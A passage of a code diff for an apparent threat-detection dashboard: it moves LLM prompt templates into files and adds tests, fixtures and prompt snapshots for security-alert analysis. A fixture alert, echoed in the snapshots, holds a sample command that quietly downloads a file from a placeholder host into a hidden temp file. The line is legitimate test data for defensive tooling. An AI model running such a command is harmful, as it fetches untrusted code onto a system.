+                  ? <ReactMarkdown remarkPlugins={[remarkGfm]}>{llmOutput}</ReactMarkdown>
+                  : <p className="text-gray-500">The AI answer will appear here</p>}
+              </div>
             </div>
           </div>
         </div>

--- a/protostar-react/src/services/PromptService.test.ts
+++ b/protostar-react/src/services/PromptService.test.ts
@@ -1,0 +1,211 @@
+import { describe, it, expect } from 'vitest';
+import PromptService, { FormatEntityTable, FormatColumnTable } from './PromptService';
+import detailsPromptTpl from '../prompts/details-prompt.txt?raw';
+import detailsSummaryPromptTpl from '../prompts/details-summary-prompt.txt?raw';
+import threatStatusSummaryPromptTpl from '../prompts/threat-status-summary-prompt.txt?raw';
+import threatStatusPromptTpl from '../prompts/threat-status-prompt.txt?raw';
+import alertSummaryPromptTpl from '../prompts/alert-summary-prompt.txt?raw';
+import alertPromptTpl from '../prompts/alert-prompt.txt?raw';
+import summaryOfThreatStatusSummaryPromptTpl from '../prompts/summary-of-threat-status-summary-prompt.txt?raw';
+import {
+  entityDetails,
+  highLevelDataList,
+  HIGH_LEVEL_FIELD_NAMES,
+  alert,
+  question,
+  priorOutput,
+  entityFieldNames,
+  entityColumns,
+} from './__fixtures__/promptFixtures';
+
+const ps = new PromptService();
+
+// Rendered with the shapes the pages actually pass. Details.tsx stringifies before
+// calling; Home/Summary/Alerts pass their structures raw.
+const rendered: [string, string][] = [
+  ['DetailsPrompt', ps.DetailsPrompt(question, JSON.stringify(entityDetails))],
+  ['DetailsSummaryPrompt', ps.DetailsSummaryPrompt(JSON.stringify(entityDetails))],
+  ['ThreatStatusSummaryPrompt', ps.ThreatStatusSummaryPrompt(FormatEntityTable(highLevelDataList))],
+  ['ThreatStatusPrompt', ps.ThreatStatusPrompt(question, FormatEntityTable(highLevelDataList))],
+  ['AlertSummaryPrompt', ps.AlertSummaryPrompt(alert)],
+  ['AlertPrompt', ps.AlertPrompt(question, alert)],
+  ['SummaryOfThreatStatusSummaryPrompt', ps.SummaryOfThreatStatusSummaryPrompt(priorOutput)],
+];
+
+const templates: [string, string][] = [
+  ['DetailsPrompt', detailsPromptTpl],
+  ['DetailsSummaryPrompt', detailsSummaryPromptTpl],
+  ['ThreatStatusSummaryPrompt', threatStatusSummaryPromptTpl],
+  ['ThreatStatusPrompt', threatStatusPromptTpl],
+  ['AlertSummaryPrompt', alertSummaryPromptTpl],
+  ['AlertPrompt', alertPromptTpl],
+  ['SummaryOfThreatStatusSummaryPrompt', summaryOfThreatStatusSummaryPromptTpl],
+];
+
+describe('prompt hygiene', () =>
+{
+  it.each(rendered)('%s has no object stringification artifacts', (_name, prompt) =>
+  {
+    expect(prompt).not.toMatch(/\[object Object\]/);
+  });
+
+  it.each(rendered)('%s substitutes every placeholder', (_name, prompt) =>
+  {
+    // a surviving ${ means the template literal was written as a plain quoted string
+    expect(prompt).not.toMatch(/\$\{/);
+  });
+
+  it.each(rendered)('%s interpolates no undefined or null values', (_name, prompt) =>
+  {
+    expect(prompt).not.toMatch(/\bundefined\b/);
+    expect(prompt).not.toMatch(/\bnull\b/);
+  });
+
+  it.each(rendered)('%s carries no leftover editing debris', (_name, prompt) =>
+  {
+    // ".       ." was left behind when the non-prod marker sentences were stripped
+    expect(prompt).not.toMatch(/\.\s{3,}\./);
+    // a gap AFTER sentence punctuation is a deletion seam (the original artifact was
+    // ".       . As mentioned"). Aligned glossary columns and trailing spaces are not.
+    expect(prompt).not.toMatch(/[.!?] {3,}\S/);
+  });
+
+  it.each(templates)('%s ends on a complete instruction', (_name, template) =>
+  {
+    // checked against the template, not the rendered prompt: a template may end with
+    // its data placeholder (the payload then trails, which is right for caching).
+    // What it must never do is end on an instruction whose referent never arrives,
+    // e.g. a trailing "place the following message:" or "using this data:".
+    expect(template.trimEnd()).toMatch(/([.!?"]|\}\})$/);
+  });
+});
+
+describe('quote balance', () =>
+{
+  // Rendered with quote-free scalars so every quote counted comes from the template
+  // itself rather than from JSON payloads.
+  const S = 'SENTINEL_DATA';
+  const Q = 'SENTINEL_QUESTION';
+  const templateOnly: [string, string][] = [
+    ['DetailsPrompt', ps.DetailsPrompt(Q, S)],
+    ['DetailsSummaryPrompt', ps.DetailsSummaryPrompt(S)],
+    ['ThreatStatusSummaryPrompt', ps.ThreatStatusSummaryPrompt(S)],
+    ['ThreatStatusPrompt', ps.ThreatStatusPrompt(Q, S)],
+    ['AlertSummaryPrompt', ps.AlertSummaryPrompt(S)],
+    ['AlertPrompt', ps.AlertPrompt(Q, S)],
+    ['SummaryOfThreatStatusSummaryPrompt', ps.SummaryOfThreatStatusSummaryPrompt(S)],
+  ];
+
+  it.each(templateOnly)('%s closes every quote it opens', (_name, prompt) =>
+  {
+    const quotes = (prompt.match(/"/g) || []).length;
+    expect(quotes % 2).toBe(0);
+  });
+});
+
+describe('data presence', () =>
+{
+  it('DetailsPrompt includes both the question and the entity data', () =>
+  {
+    const prompt = ps.DetailsPrompt(question, JSON.stringify(entityDetails));
+    expect(prompt).toContain(question);
+    expect(prompt).toContain('workstation-42');
+    expect(prompt).toContain('10.4.9.201');
+  });
+
+  it('DetailsSummaryPrompt includes the entity data', () =>
+  {
+    expect(ps.DetailsSummaryPrompt(JSON.stringify(entityDetails))).toContain('workstation-42');
+  });
+
+  it('ThreatStatusPrompt includes both the question and the data', () =>
+  {
+    const prompt = ps.ThreatStatusPrompt(question, FormatEntityTable(highLevelDataList));
+    expect(prompt).toContain(question);
+    expect(prompt).toContain('workstation-42');
+  });
+
+  it('AlertSummaryPrompt includes the specific alert', () =>
+  {
+    const prompt = ps.AlertSummaryPrompt(alert);
+    expect(prompt).toContain(alert.guid);
+    expect(prompt).toContain('203.0.113.44');
+  });
+
+  it('AlertPrompt includes the question and the selected alert', () =>
+  {
+    const prompt = ps.AlertPrompt(question, alert);
+    expect(prompt).toContain(question);
+    expect(prompt).toContain(alert.guid);
+    expect(prompt).toContain('203.0.113.44');
+  });
+
+  it('SummaryOfThreatStatusSummaryPrompt includes the prior output', () =>
+  {
+    expect(ps.SummaryOfThreatStatusSummaryPrompt(priorOutput)).toContain(priorOutput);
+  });
+});
+
+describe('data contract', () =>
+{
+  // These prompts instruct the model to "identify fields you recognize" and
+  // "explain each field". That is only answerable if the payload labels its
+  // fields and delimits its records.
+  it('ThreatStatusSummaryPrompt payload labels its fields', () =>
+  {
+    const prompt = ps.ThreatStatusSummaryPrompt(FormatEntityTable(highLevelDataList));
+    for(const field of HIGH_LEVEL_FIELD_NAMES)
+    {
+      expect(prompt).toContain(field);
+    }
+  });
+
+  it('ThreatStatusSummaryPrompt payload keeps records distinguishable', () =>
+  {
+    const prompt = ps.ThreatStatusSummaryPrompt(FormatEntityTable(highLevelDataList));
+    // a raw array-of-arrays flattens to one undelimited comma run, so the boundary
+    // between the last field of one entity and the first of the next disappears
+    expect(prompt).not.toContain('272,db-prod-03');
+  });
+});
+
+describe('rendered snapshots', () =>
+{
+  // Prompt edits are invisible in review as template-literal diffs. These snapshots
+  // surface the fully rendered text instead.
+  it.each(rendered)('%s', (_name, prompt) =>
+  {
+    expect(prompt).toMatchSnapshot();
+  });
+});
+
+describe('FormatColumnTable', () =>
+{
+  const table = FormatColumnTable(entityFieldNames, entityColumns);
+
+  it('puts the real column names in the header row', () =>
+  {
+    expect(table.split('\n')[0]).toBe('detection_type,severity,mitre_tactic,category,username');
+  });
+
+  it('transposes columns into one line per record', () =>
+  {
+    const lines = table.split('\n');
+    expect(lines).toHaveLength(4);                                  // header + 3 records
+    expect(lines[1]).toBe('CLOUD_ALERT,,,AssumeRoleWithWebIdentity,svc-dataset-worker');
+    expect(lines[3]).toBe('K8_ML,,,linux,svc-dataset-worker');
+  });
+
+  it('keeps every row aligned to the header width', () =>
+  {
+    for(const line of table.split('\n'))
+    {
+      expect(line.split(',')).toHaveLength(entityFieldNames.length);
+    }
+  });
+
+  it('returns empty string for no data rather than a bare header', () =>
+  {
+    expect(FormatColumnTable(entityFieldNames, [])).toBe('');
+  });
+});

--- a/protostar-react/src/services/PromptService.ts
+++ b/protostar-react/src/services/PromptService.ts
@@ -1,63 +1,96 @@
+import detailsPromptTpl from '../prompts/details-prompt.txt?raw';
+import detailsSummaryPromptTpl from '../prompts/details-summary-prompt.txt?raw';
+import threatStatusSummaryPromptTpl from '../prompts/threat-status-summary-prompt.txt?raw';
+import threatStatusPromptTpl from '../prompts/threat-status-prompt.txt?raw';
+import alertSummaryPromptTpl from '../prompts/alert-summary-prompt.txt?raw';
+import alertPromptTpl from '../prompts/alert-prompt.txt?raw';
+import summaryOfThreatStatusSummaryPromptTpl from '../prompts/summary-of-threat-status-summary-prompt.txt?raw';
+
+// Replaces {{name}} with the supplied value. An unknown placeholder is left in
+// place so a typo shows up in the prompt rather than silently emptying it.
+function render(template: string, values: Record<string, any>)
+{
+  // trim so a trailing newline in the file never reaches the model
+  return template.trim().replace(/\{\{(\w+)\}\}/g, (match, key) => key in values ? String(values[key]) : match);
+}
+// Column order of the high-level entity rows built by Home and Summary.
+export const HIGH_LEVEL_FIELD_NAMES = ['Entity', 'Entity Type', 'Ip', 'Atomic Weight', 'Atomic Mass'];
+
+// Renders entity rows as a labelled table. Interpolating the raw array flattens it
+// to one undelimited comma run, which strips the field names and the record
+// boundaries the prompts ask the model to reason about.
+export function FormatEntityTable(rows: any[][], fieldNames: string[] = HIGH_LEVEL_FIELD_NAMES)
+{
+  if(!Array.isArray(rows) || !rows.length)
+  {
+    return '';
+  }
+  let lines = [fieldNames.join(',')];
+  for(const row of rows)
+  {
+    lines.push((Array.isArray(row) ? row : [row]).map(cell => String(cell ?? '-')).join(','));
+  }
+  return lines.join('\n');
+}
+
+// Transposes column-major data into labelled CSV rows. The entity details endpoint
+// returns a dataframe serialised as {column: {rowIndex: value}}; interpolating its
+// values directly strips the column names the prompts ask the model to reason about.
+export function FormatColumnTable(fieldNames: string[], columns: any[])
+{
+  if(!Array.isArray(columns) || !columns.length)
+  {
+    return '';
+  }
+  const rowKeys = Object.keys(columns[0] ?? {});
+  const rows = rowKeys.map(key => columns.map(column => column?.[key] ?? ''));
+  return FormatEntityTable(rows, fieldNames);
+}
+
 export default class PromptService
 {
   constructor() {}
 
+// Details.tsx page question
   public DetailsPrompt(question: string, details: any)
   {
-    let finalPrompt = `Can you explain the security risks and steps for mitigation using the following data:" "${details}", answer the 
-    following question: "${question}. Answer it as detailed as you can.       . As mentioned be detailed with the response but also concise and 
-    to the point.`;
+    let finalPrompt = render(detailsPromptTpl, { details, question });
     return finalPrompt; 
   }
-
+// Details.tsx page entity summary
   public DetailsSummaryPrompt(details: any)
   {
-    let finalPrompt = `Can you explain the security risks and steps for mitigation using the following data:" "${details}", can you give me a summary of 
-    what I need to priortize for this particular entity. Answer it as detailed as you can.       . As mentioned be detailed with the response but also concise and 
-    to the point.`;
+    let finalPrompt = render(detailsSummaryPromptTpl, { details });
     return finalPrompt; 
   }
-
+// Summary generator for Summary.tsx page
   public ThreatStatusSummaryPrompt(details: any)
   {
-    let finalPrompt = `Can you explain the security risks and steps for mitigation using a summary explanation of the data and what the scores mean. Give a 
-    summary report on the data and explain what the nature of the activity is. Be verbose and identify fields you recognize. Explain each 
-    field that you recognize and what kind of data it contains. Suggest possible investigative directions. ${details}.       . As mentioned be detailed with the response but also concise and 
-    to the point.`;
+    let finalPrompt = render(threatStatusSummaryPromptTpl, { details });
     return finalPrompt;
   }
-
+// Summary.tsx page question 
   public ThreatStatusPrompt(question: string, details: any)
   {
-    let finalPrompt = `Can you explain the security risks and steps for mitigation using this information and based on this data: "${details}" Next, answer 
-    the following specific question: "${question}"  and repeat my question to me. When answering explain each field that
-    you recognize and what kind of data it contains and suggest possible investigative directions. Answer it as best as you can.       . As mentioned be detailed with the response but also concise and 
-    to the point.`;
+    let finalPrompt = render(threatStatusPromptTpl, { details, question });
     return finalPrompt;
   }
-
-  public AlertSummaryPrompt(details: any, specificDetails: any)
+// Alerts.tsx explainer 
+  public AlertSummaryPrompt(specificDetails: any)
   {
-    let finalPrompt = `Can you explain the security risks and steps for mitigation using the data specific to this alert: ${JSON.stringify(specificDetails)} and here's the data for 
-    the overall entity: ${JSON.stringify(details)}. As previously mentioned give a summary but coorelate the importance between the alert and the overall entity.       . As mentioned be detailed with the response but also concise and 
-    to the point.`;
+    let finalPrompt = render(alertSummaryPromptTpl, { specificDetails: JSON.stringify(specificDetails) });
     return finalPrompt;
   }
-
-  public AlertPrompt(question: string, details: any, specificDetails: any)
+// Alert question prompt (not currently wired)
+  public AlertPrompt(question: string, details: any)
   {
-    let finalPrompt = `Answer the following question in quotes "${question}" on the data and based on what the nature of the activity is. Explain the cybersecurity risks.
-    Be verbose and identify fields you recognize. Answer every part of the question that you recognize and which data relates best to it. Suggest possible investigative directions listed in steps. Here
-    are the details for the specific alert: "${JSON.stringify(details)}" and here's the information for the overall entity: "${specificDetails}. Make correlations between 
-    the two when answering the question. Answer it as best as you can.       . As mentioned be detailed with the response but also concise and 
-    to the point.`;
+    let finalPrompt = render(alertPromptTpl, { question, details: JSON.stringify(details) });
     return finalPrompt;
   }
-
+//  Home.tsx summary generator
   public SummaryOfThreatStatusSummaryPrompt(details: any)
   {
-    let finalPrompt = `Can you give me a further summary and explain the security risks and mitigation steps based on this output: ${details}. Answer it as best as you can. At the beginning 
-    of the response place the following message: `;
+    let finalPrompt = render(summaryOfThreatStatusSummaryPromptTpl, { details });
     return finalPrompt;
   }
 }

--- a/protostar-react/src/services/__fixtures__/promptFixtures.ts
+++ b/protostar-react/src/services/__fixtures__/promptFixtures.ts
@@ -1,0 +1,64 @@
+// Fixtures mirror the exact shapes the pages hand to PromptService. Shapes matter
+// more than values here: a hand-written flat array would hide the array-of-arrays
+// flattening that a template literal performs.
+
+// Details.tsx holds entityDetails column-major: entityDetails[fieldIndex][rowIndex].
+export const entityDetails: string[][] = [
+  ['workstation-42', 'db-prod-03'],
+  ['Host', 'Host'],
+  ['10.4.2.17', '10.4.9.201'],
+  ['181.7', '204.3'],
+  ['272', '311'],
+];
+
+// Home.tsx / Summary.tsx build this from a Set of comma-joined rows, one array per
+// entity, in the column order named by HIGH_LEVEL_FIELD_NAMES below.
+export const highLevelDataList: string[][] = [
+  ['workstation-42', 'Host', '10.4.2.17', '181.7', '272'],
+  ['db-prod-03', 'Host', '10.4.9.201', '204.3', '311'],
+  ['svc-backup', 'Account', '10.4.2.90', '96.2', '140'],
+];
+
+// Declared in Home.tsx:50 and Summary.tsx:63 and fed to the table headers. The
+// pages intend to merge these into the prompt payload but the concat that would
+// do it discards its result — see the "data contract" tests.
+export const HIGH_LEVEL_FIELD_NAMES = ['Entity', 'Entity Type', 'Ip', 'Atomic Weight', 'Atomic Mass'];
+
+export const alert = {
+  guid: 'a1f3c9e2-77b4-4d21-9c30-6be0f1d84c55',
+  entity: 'workstation-42',
+  timestamp: '2026-08-14T02:41:09Z',
+  category: 'Execution',
+  mitre_tactic: 'TA0002',
+  severity: 'High',
+  username: 'svc-backup',
+  host_ip: '10.4.2.17',
+  source_ip: '10.4.2.17',
+  dest_ip: '203.0.113.44',
+  dest_port: '8443',
+  dst_geo: 'RO',
+  executable: '/usr/bin/curl',
+  syscall_name: 'execve',
+  process: 'curl',
+  proctitle: 'curl -sk https://203.0.113.44:8443/x -o /tmp/.cache',
+  message: 'Outbound transfer to low-reputation host',
+};
+
+
+export const question = 'Why is this entity scoring so high?';
+
+// Prior LLM output — the only argument that is legitimately a plain string.
+export const priorOutput =
+  'Three hosts show elevated atomic weight. workstation-42 executed curl against a low-reputation endpoint.';
+
+// Shape returned by RetrieveEntityDetailsNeo: a pandas frame serialised column-major,
+// keyed by column then row index. Details.tsx holds the column names separately in
+// entityFields and the values in entityDetails.
+export const entityFieldNames = ['detection_type', 'severity', 'mitre_tactic', 'category', 'username'];
+export const entityColumns = [
+  { '0': 'CLOUD_ALERT', '1': 'K8_ALERT', '2': 'K8_ML' },
+  { '0': '', '1': '', '2': '' },
+  { '0': '', '1': '', '2': '' },
+  { '0': 'AssumeRoleWithWebIdentity', '1': 'get', '2': 'linux' },
+  { '0': 'svc-dataset-worker', '1': 'svc-dataset-worker', '2': 'svc-dataset-worker' },
+];

--- a/protostar-react/src/services/__snapshots__/PromptService.test.ts.snap
+++ b/protostar-react/src/services/__snapshots__/PromptService.test.ts.snap
@@ -1,0 +1,268 @@
+// Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html
+
+exports[`rendered snapshots > AlertPrompt 1`] = `
+"Answer the following question in quotes 
+
+"Why is this entity scoring so high?" 
+
+on the data and based on what the nature of the activity is. Explain the cybersecurity risks.
+    Be verbose and identify fields you recognize. Answer every part of the question that you recognize and which data relates best to it. Suggest possible investigative directions listed in steps. Here
+    are the details for the specific alert: 
+    
+    "{"guid":"a1f3c9e2-77b4-4d21-9c30-6be0f1d84c55","entity":"workstation-42","timestamp":"2026-08-14T02:41:09Z","category":"Execution","mitre_tactic":"TA0002","severity":"High","username":"svc-backup","host_ip":"10.4.2.17","source_ip":"10.4.2.17","dest_ip":"203.0.113.44","dest_port":"8443","dst_geo":"RO","executable":"/usr/bin/curl","syscall_name":"execve","process":"curl","proctitle":"curl -sk https://203.0.113.44:8443/x -o /tmp/.cache","message":"Outbound transfer to low-reputation host"}"
+    
+    Answer it as best as you can. As mentioned be detailed with the response but also concise and 
+    to the point."
+`;
+
+exports[`rendered snapshots > AlertSummaryPrompt 1`] = `
+"[System Role/Instruction]
+
+      [Background Knowledge]
+
+      Handle all text case insensitively. The data contains the following elements: First, there is a CSV data structure with column names.
+
+Here is some knowledge of the alert fields:
+
+[Alert Field Definitions]
+
+The alert is a single JSON object. Each key is a field name and each value is
+that field's value. Ignore any field whose value is an empty string; empty means
+the detector did not capture it, not that the value is zero or benign.
+
+entity            the person, device, account, or process the alert is about.
+entity_type       what kind of thing the entity is: endpoint, host, cloud user,
+                  cloud user role, kubernetes pod, or Github user.
+detection_type    which detector fired. See the detection type list above.
+name              the specific detection that fired, and the most precise
+                  description of what happened, e.g.
+                  BASE64_DECODED_PAYLOAD_PIPED_TO_INTERPRETER or
+                  ANOMALOUS_NETWORK_PROCESS. Lead your explanation with this.
+severity          urgency assigned by the detector: critical, high, or medium.
+                  Treat case insensitively; "High" and "high" are the same.
+timestamp         when the activity occurred.
+guid              unique identifier for the alert. Do not discuss it.
+category          what the detection was about. For cloud detections this is the
+                  API action invoked, such as ListBuckets or
+                  AssumeRoleWithWebIdentity. For host and container detections
+                  it is the platform, such as linux, Windows, kubernetes, DNS,
+                  Network, or Github.
+username          the account or identity involved. May be a local account such
+                  as LOCAL SERVICE, a person, a service account, or an AWS ARN.
+source_ip         the address the activity came from.
+mitre_tactic      the adversary's goal, from MITRE ATT&CK. Often empty; empty
+                  means unmapped, not harmless.
+message           free-text detail from the detector. Do not comment on how the
+                  telemetry was produced or on the wording of this field.
+host_ip           the address of the host the alert was observed on.
+process           the process involved, e.g. bash or rundll32.exe.
+dest_ip           the destination address contacted.
+dest_port         the destination port contacted.
+executable        the full path of the binary involved, e.g. /usr/bin/curl.
+dst_geo           the country the destination address resolves to.
+
+The fields proctitle and syscall_name are almost always empty and can be ignored.
+
+detection_type: the type of alert or detection that has been processed involving an entity. The following detection types exist:
+
+CLOUD_ALERT                     an alert that was created by a query evaluating true on a Cloudtrail event log.
+CLOUD_MACHINE_LEARNING          a machine learning anomaly detection alert that identified an anomalous outlier event in Cloudtrail logs.
+KUBERNETES_ALERT                an alert that was created by a query evaluating true on Kubernetes logs.
+ENDPOINT_ALERT                  an alert that was created by a query evaluating true on events from an EDR agent.
+ENDPOINT_MACHINE_LEARNING       a machine learning anomaly detection alert that identified an anomalous outlier event EDR log events.
+R_PROCESS                        the entity in the detection set has relationships to another detection set. This can be lateral movement between assets or multi-asset compromise. Such relationships between high confidence sets tend to be critical as the intrusion scope expands.
+SIGNAL_MULTIPLE_PHENOMENOLOGY    A match was found between conventional alerts and machine learning anomaly detections. This combination indicates high confidence that a true positive set of threat detections has been found.
+NETWORK_MACHINE_LEARNING         a machine learning anomaly detection alert that identified an anomalous outlier event in network  logs.
+GITHUB_MACHINE_LEARNING          a machine learning anomaly detection alert that identified an anomalous outlier event in GitHub  logs.
+SIGNAL                           A match was found between conventional alerts and machine learning anomaly detections. This combination indicates high confidence that a true positive set of threat detections has been found.
+NETWORK_ANOMALY                  a machine learning anomaly detection alert that identified an anomalous outlier event in network  logs.
+DNS_MACHINE_LEARNING             a machine learning anomaly detection alert that identified anomalous activity in DNS  logs.
+KUBERNETES_MACHINE_LEARNING      a machine learning anomaly detection alert that identified an anomalous outlier event in Kubernetes logs.
+SURICATA_ALERT                   a threat detection alert that came from a Suricata instance 
+STABLE_ISOTOPE                   a single alert that has special importance because it has high true positive confidence and its importance does not decrease with time. Isotopes are high confidence threat detections and do not need corroboration.
+
+[User Instructions/Task]
+
+First, state each field you parsed so that we know you have parsed it correctly. Give an analysis of the threat detections using the knowledge provided herein and the confidence level of the detection set. Explain what is going on in the alert. what has been detected, and the significance.
+Give an opinion on whether it is a true or false positive detection.
+Identify 1-3 key questions or additional context points that would provide more clarity.
+
+Using the following alert data: 
+
+ {"guid":"a1f3c9e2-77b4-4d21-9c30-6be0f1d84c55","entity":"workstation-42","timestamp":"2026-08-14T02:41:09Z","category":"Execution","mitre_tactic":"TA0002","severity":"High","username":"svc-backup","host_ip":"10.4.2.17","source_ip":"10.4.2.17","dest_ip":"203.0.113.44","dest_port":"8443","dst_geo":"RO","executable":"/usr/bin/curl","syscall_name":"execve","process":"curl","proctitle":"curl -sk https://203.0.113.44:8443/x -o /tmp/.cache","message":"Outbound transfer to low-reputation host"}"
+`;
+
+exports[`rendered snapshots > DetailsPrompt 1`] = `
+"[System Role/Instruction]
+
+      [Background Knowledge]
+
+      Handle all text case insensitively. The data contains the following elements: First, there is a CSV data structure with column names. This is the data you need to answer the question about: 
+
+Here are the CSV field definitions: 
+
+detection_type: these are defined below:
+severity: the severity label for the alert. This is informational and not a key metric.
+mitre_tactic: mitre tactic names for the alert which give some categorization of the threat; these are not always populated
+category: the data type used in the set which also tells us what kind of target asset is the subject of the detections, it may be an endpoint, a host, a cloud user, a Github user, or a kubernetes pod. 
+username: the user name found in the alert events, if there is one. Not always populated. 
+
+detection_type: the type of alert or detection that has been processed involving an entity. The following detection types exist:
+
+CLOUD_ALERT                     an alert that was created by a query evaluating true on a Cloudtrail event log.
+CLOUD_MACHINE_LEARNING          a machine learning anomaly detection alert that identified an anomalous outlier event in Cloudtrail logs.
+KUBERNETES_ALERT                an alert that was created by a query evaluating true on Kubernetes logs.
+ENDPOINT_ALERT                  an alert that was created by a query evaluating true on events from an EDR agent.
+ENDPOINT_MACHINE_LEARNING       a machine learning anomaly detection alert that identified an anomalous outlier event EDR log events.
+R_PROCESS                        the entity in the detection set has relationships to another detection set. This can be lateral movement between assets or multi-asset compromise. Such relationships between high confidence sets tend to be critical as the intrusion scope expands.
+SIGNAL_MULTIPLE_PHENOMENOLOGY    A match was found between conventional alerts and machine learning anomaly detections. This combination indicates high confidence that a true positive set of threat detections has been found.
+NETWORK_MACHINE_LEARNING         a machine learning anomaly detection alert that identified an anomalous outlier event in network  logs.
+GITHUB_MACHINE_LEARNING          a machine learning anomaly detection alert that identified an anomalous outlier event in GitHub  logs.
+SIGNAL                           A match was found between conventional alerts and machine learning anomaly detections. This combination indicates high confidence that a true positive set of threat detections has been found.
+NETWORK_ANOMALY                  a machine learning anomaly detection alert that identified an anomalous outlier event in network  logs.
+DNS_MACHINE_LEARNING             a machine learning anomaly detection alert that identified anomalous activity in DNS  logs.
+KUBERNETES_MACHINE_LEARNING      a machine learning anomaly detection alert that identified an anomalous outlier event in Kubernetes logs.
+SURICATA_ALERT                   a threat detection alert that came from a Suricata instance 
+STABLE_ISOTOPE                   a single alert that has special importance because it has high true positive confidence and its importance does not decrease with time. Isotopes are high confidence threat detections and do not need corroboration.
+
+Evaluating relationships in making confidence decisions:
+
+- Multiple phenomenology indicates high confidence that multiple detection pipelines agree that threat activity has been detected. For example, high confidence occurs when both the conventional and machine learning detections evaluate the same events as threat activity  . This means the machine learning detections match known patterns of threat activity, and the conventional alerts involve events and activity that is unusual, which means they are less likely to be false positives. 
+ - A  combination of sources also indicates high confidence because multiple threat detection products, engines, or platforms, all identified threat activity involving the same entity. 
+- an r-process relationship means the entity in the set is part of a superset where a threat actor is moving laterally or persisting in multiple assets. These are usually critical. 
+
+[User Instructions/Task]
+
+First, repeat the data from the details provided and state what each field is so that we know you have parsed it correctly. Give an analysis of the threat detections using the knowledge provided herein and the confidence level of the detection set. Repeat the question so we can see you received it. 
+
+Using the following data: "[["workstation-42","db-prod-03"],["Host","Host"],["10.4.2.17","10.4.9.201"],["181.7","204.3"],["272","311"]]" to answer the following question: "Why is this entity scoring so high?""
+`;
+
+exports[`rendered snapshots > DetailsSummaryPrompt 1`] = `
+"[System Role/Instruction]
+
+      [Background Knowledge]
+
+      Handle all text case insensitively. The data contains the following elements: First, there is a CSV data structure with column names.
+
+Here are the CSV field definitions: 
+
+detection_type: these are defined below:
+severity: the severity label for the alert. This is informational and not a key metric.
+mitre_tactic: mitre tactic names for the alert which give some categorization of the threat; these are not always populated
+category: the data type used in the set which also tells us what kind of target asset is the subject of the detections, it may be an endpoint, a host, a cloud user, a Github user, or a kubernetes pod. 
+username: the user name found in the alert events, if there is one. Not always populated. 
+
+detection_type: the type of alert or detection that has been processed involving an entity. The following detection types exist:
+
+CLOUD_ALERT                     an alert that was created by a query evaluating true on a Cloudtrail event log.
+CLOUD_MACHINE_LEARNING          a machine learning anomaly detection alert that identified an anomalous outlier event in Cloudtrail logs.
+KUBERNETES_ALERT                an alert that was created by a query evaluating true on Kubernetes logs.
+ENDPOINT_ALERT                  an alert that was created by a query evaluating true on events from an EDR agent.
+ENDPOINT_MACHINE_LEARNING       a machine learning anomaly detection alert that identified an anomalous outlier event EDR log events.
+R_PROCESS                        the entity in the detection set has relationships to another detection set. This can be lateral movement between assets or multi-asset compromise. Such relationships between high confidence sets tend to be critical as the intrusion scope expands.
+SIGNAL_MULTIPLE_PHENOMENOLOGY    A match was found between conventional alerts and machine learning anomaly detections. This combination indicates high confidence that a true positive set of threat detections has been found.
+NETWORK_MACHINE_LEARNING         a machine learning anomaly detection alert that identified an anomalous outlier event in network  logs.
+GITHUB_MACHINE_LEARNING          a machine learning anomaly detection alert that identified an anomalous outlier event in GitHub  logs.
+SIGNAL                           A match was found between conventional alerts and machine learning anomaly detections. This combination indicates high confidence that a true positive set of threat detections has been found.
+NETWORK_ANOMALY                  a machine learning anomaly detection alert that identified an anomalous outlier event in network  logs.
+DNS_MACHINE_LEARNING             a machine learning anomaly detection alert that identified anomalous activity in DNS  logs.
+KUBERNETES_MACHINE_LEARNING      a machine learning anomaly detection alert that identified an anomalous outlier event in Kubernetes logs.
+SURICATA_ALERT                   a threat detection alert that came from a Suricata instance 
+STABLE_ISOTOPE                   a single alert that has special importance because it has high true positive confidence and its importance does not decrease with time. Isotopes are high confidence threat detections and do not need corroboration.
+
+Evaluating relationships in making confidence decisions:
+
+- Multiple phenomenology indicates high confidence that multiple detection pipelines agree that threat activity has been detected. For example, high confidence occurs when both the conventional and machine learning detections evaluate the same events as threat activity  . This means the machine learning detections match known patterns of threat activity, and the conventional alerts involve events and activity that is unusual, which means they are less likely to be false positives. 
+ - A  combination of sources also indicates high confidence because multiple threat detection products, engines, or platforms, all identified threat activity involving the same entity. 
+- an r-process relationship means the entity in the set is part of a superset where a threat actor is moving laterally or persisting in multiple assets. These are usually critical. 
+
+[User Instructions/Task]
+
+First, repeat the data from the details provided and state what each field is so that we know you have parsed it correctly. Give an analysis of the threat detections using the knowledge provided herein and the confidence level of the detection set. 
+
+Using the following data: "[["workstation-42","db-prod-03"],["Host","Host"],["10.4.2.17","10.4.9.201"],["181.7","204.3"],["272","311"]]""
+`;
+
+exports[`rendered snapshots > SummaryOfThreatStatusSummaryPrompt 1`] = `
+"[System Role/Instruction]
+
+      You are an expert threat hunter and detection analyst using an advanced threat detection platform. You are reading summary threat detection posture information.
+
+      [Background Knowledge]
+
+      this is not a set of log entries, this is a summary table of all available threat detections for various entities. Each row contains a scored set of detection relationships for an entity.
+
+      The following entity types exist in the table:
+  
+      an entity type of endpoint is a computer with an EDR agent. We may have any combination of host and network detections for an endpoint.
+      an entity type of host is a network device without an EDR agent for which we have only network data and detections.
+      an entity type of user is a username not associated with an endpoint or user. a user entity that starts with arn: is an aws username and we would only have cloudtrail data for aws users. An AWS user entity with a core of 4 or above means that a combination of conventional alerts and machine learning anomaly detections has created a high confidence set of detections of suspicious activity. Threat activity involving a root aws user tends to be more critical.
+      an ip is the IP address of the endpoint or host and is not inherently important to the question of which set is most important.
+    
+      The following metrics exist:
+
+      atomic mass is a count of the total number of alerts in the set.
+      atomic weight is a score of importance andis based on the number of detection relationships in the set; more relationships gives higher confidence and corroboration. This tends to make atomic weight more important than atomic mass.
+      Detections may be any combinations of conventional alerts and machine learning
+      anomalies.
+      The entities named connorj and sarah have been displayed in red because they contain high confidence relationships in their detection sets. this makes them important.
+
+      [User Instructions/Task]
+
+ Give an analysis and explanation of the data using this output: "Three hosts show elevated atomic weight. workstation-42 executed curl against a low-reputation endpoint."  
+
+ Give a  report on the data and explain what the nature of the activity is. Be verbose and identify fields you recognize. Explain each field that you recognize and what kind of data it contains. Suggest possible investigative directions."
+`;
+
+exports[`rendered snapshots > ThreatStatusPrompt 1`] = `
+"[System Role/Instruction]
+
+      You are an expert threat hunter and detection analyst using an advanced threat detection platform. You are reading summary threat detection scoring information.
+
+      [Background Knowledge]
+
+      Handle all text case insensitively. The data contains the following elements: First, there is a CSV data structure with column names. This is the data you need to answer the question about. Here are the CSV field definitions: 
+
